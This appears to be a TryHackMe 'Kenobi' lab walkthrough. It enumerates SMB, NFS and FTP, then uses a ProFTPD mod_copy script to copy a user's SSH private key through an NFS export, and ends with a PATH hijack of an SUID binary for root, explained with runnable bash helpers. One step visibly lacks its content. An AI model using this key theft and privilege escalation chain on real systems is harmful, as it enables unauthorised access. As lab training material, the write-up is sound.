# [[Kenobi]]
---
## Port Scanning and Enumeration (Nmap, SMB, FTP)
---
```
nmap -sV -oN nmap/init -sC -vv $IP
```

```
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP -oN nmap/smb
```

Connecting to the `anonymous` share with `smbclient` (`-N` skips the password prompt):
```
smbclient -N //10.10.181.253/anonymous
```

The `log.txt` file in the share shows kenobi's SSH key pair being generated, along with the basic `ProFTPD` configuration file.

Running nmap against port 111 (rpcbind) with the NFS scripts shows that `/var` is exported over NFS:
```
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.253
```

Grabbing the banner of the FTP server on port 21 identifies the ProFTPD version:
```
nc 10.10.181.253 21
```

## Foothold (Metasploit, Mount)
---
Searching `searchsploit` for that ProFTPD version turns up the `mod_copy` exploit.

`SITE CPFR` (copy from) and `SITE CPTO` (copy to) are `mod_copy` commands, and the vulnerable version accepts them before any login, so any file the FTP daemon's user can read can be copied anywhere it can write.
The log file said an SSH key pair was created and gave its location. Let's copy the private key into `/var/tmp`, since `/var` is the directory exported over NFS and we can mount it.

```
mkdir /mnt/kenobiNFS
mount 10.10.181.253:/var /mnt/kenobiNFS
```

The mounted export gives us `/mnt/kenobiNFS/tmp`, where the copied key now sits. Copy it locally, restrict its permissions, and log in as kenobi over SSH with it.
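The whole foothold chain, as an added example that is not part of the original writeup: the `mod_copy` exchange is built as raw FTP commands piped through `nc`, the server's replies are checked for the `350`/`250` codes that CPFR and CPTO return on success, and the mount/SSH steps follow as a helper. The private key path `/home/kenobi/.ssh/id_rsa` is an assumption (the writeup only says `log.txt` names the location), and the function names and the sample transcripts are mine.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): copy a file server-side with
# ProFTPD mod_copy's SITE CPFR / SITE CPTO, then fetch it over the NFS export.
set -eu

# Build the raw FTP session. mod_copy honoured SITE CPFR/CPTO before any
# USER/PASS, so no login lines are sent at all.
mod_copy_session() {
  local src=$1 dst=$2
  printf 'SITE CPFR %s\r\nSITE CPTO %s\r\nQUIT\r\n' "$src" "$dst"
}

# Check the server transcript: CPFR must answer 350 ("ready for destination
# name") and CPTO must answer 250 ("Copy successful"). A 5xx such as
# 550 "No such file or directory" means nothing was copied.
mod_copy_succeeded() {
  local transcript=$1
  printf '%s\n' "$transcript" | grep -q '^350 ' &&
  printf '%s\n' "$transcript" | grep -q '^250 '
}

# Run the session against a host (needs nc); prints the transcript and
# returns 0 only when both replies were good.
mod_copy() {
  local host=$1 src=$2 dst=$3 reply
  reply=$(mod_copy_session "$src" "$dst" | nc -w 5 "$host" 21)
  printf '%s\n' "$reply"
  mod_copy_succeeded "$reply"
}

# Full chain from the attacker machine (mount needs root). The key path is an
# assumption; /var/tmp is inside the exported /var tree.
foothold() {
  mod_copy 10.10.181.253 /home/kenobi/.ssh/id_rsa /var/tmp/id_rsa
  mkdir -p /mnt/kenobiNFS
  mount 10.10.181.253:/var /mnt/kenobiNFS
  cp /mnt/kenobiNFS/tmp/id_rsa ./id_rsa
  chmod 600 ./id_rsa   # ssh refuses a private key readable by others
  ssh -i ./id_rsa kenobi@10.10.181.253
}
```

Run `foothold` on the attacker box; the `chmod 600` matters because the copied key inherits permissions from the NFS export and `ssh` will reject it otherwise.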

## Privilege Escalation (SUID)
---
Now that we have access we want to get root. Let's do a search for SUID binaries

`find / -perm -u=s -type f 2>/dev/null`

The odd one out is `/usr/bin/menu`

Let's run `strings` on it and see what it contains.
The interesting part is:

Since it calls `curl` without a full path, maybe we can hijack the lookup.

By creating our own `curl` and putting its directory first in `PATH`, we make `/usr/bin/menu` run *our* `curl`. Since `/usr/bin/menu` is SUID root, our replacement runs with root's effective UID, giving us a root shell.
After switching `PATH` back to the default:
`source /etc/environment`
we can cat the root flag.
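The PATH hijack reproduced locally, as an added example that is not part of the original writeup: a stand-in for `/usr/bin/menu` that calls `curl` by bare name is written to a temp directory, an attacker-controlled `curl` is placed first in `PATH`, and the stub is run; a second function shows what a hardened caller that resets `PATH` resolves `curl` to. The stub scripts, directory names and function names are mine, and nothing here is SUID, so it is safe to run anywhere.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): demonstrate PATH hijacking of a
# program that calls curl without a full path, using a harmless stand-in.
set -eu

# Stand-in for /usr/bin/menu: like the real binary, it runs `curl` by bare name,
# so the shell searches PATH for it.
make_stub_menu() {
  local dir=$1
  cat > "$dir/menu" <<'EOF'
#!/bin/sh
curl -I localhost
EOF
  chmod +x "$dir/menu"
}

# The attacker's curl. On the box this would be `echo /bin/sh > /tmp/curl` so the
# shell inherits the SUID binary's effective UID; here it just reports it ran.
make_fake_curl() {
  local dir=$1
  cat > "$dir/curl" <<'EOF'
#!/bin/sh
echo "hijacked: curl replaced, running as $(id -un)"
EOF
  chmod +x "$dir/curl"
}

# Run the stub with the attacker's directory first in PATH and return its output.
demo_path_hijack() {
  local work out
  work=$(mktemp -d)
  make_stub_menu "$work"
  mkdir "$work/evil"
  make_fake_curl "$work/evil"
  out=$(PATH="$work/evil:$PATH" "$work/menu")
  rm -rf "$work"
  printf '%s\n' "$out"
}

# The fix: a privileged caller resets PATH to trusted directories (or invokes
# /usr/bin/curl by absolute path), so the attacker's directory is never searched.
# Returns the path curl resolves to under a reset PATH, or "none" if absent.
demo_hardened_lookup() {
  local work where
  work=$(mktemp -d)
  mkdir "$work/evil"
  make_fake_curl "$work/evil"
  where=$(PATH="$work/evil:$PATH" sh -c 'PATH=/usr/local/bin:/usr/bin:/bin; command -v curl || echo none')
  rm -rf "$work"
  printf '%s\n' "$where"
}

demo_path_hijack
```

On the box, make the fake `curl` run `/bin/sh` rather than `echo`, and note that if `/bin/sh` is bash it drops the elevated effective UID unless started with `-p`; on Ubuntu `/bin/sh` is dash, which keeps it, so the `id` output shows `euid=0(root)`.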
---
Back to [[TryHackMe Index|TryHackMe Index]]
Tags: #thm #tryhackme #box_writeups #smbclient #smb #nfs #ssh #suid
Related: